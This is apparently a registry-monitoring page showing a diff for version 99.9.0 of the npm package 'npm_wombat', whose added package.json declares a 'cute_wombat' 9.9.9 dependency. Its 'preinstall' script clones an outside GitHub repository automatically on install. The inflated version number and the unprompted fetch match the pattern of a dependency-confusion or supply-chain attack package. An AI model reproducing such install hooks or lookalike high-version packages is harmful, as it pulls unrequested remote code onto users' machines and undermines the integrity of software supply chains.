RubyGems
npm
Organizations
Log in
Sign up
npm
npm_wombat
Versions diffs
99.9.0
npm_wombat 99.9.0
Sign up to get
free
protection for your applications and to get access to all the features.
Files changed (1)
hide
show
package/package.json
+10
-0
package/package.json
ADDED
Viewed
@@ -0,0 +1,10 @@
1
+
{
2
+
"name": "npm_wombat",
3
+
"version": "99.9.0",
4
+
"scripts": {
5
+
"preinstall": "git clone https://github.com/pingjuu/BLOOMFUZZ.git"
6
+
},
7
+
"dependencies": {
8
+
"cute_wombat": "9.9.9"
9
+
}
10
+
}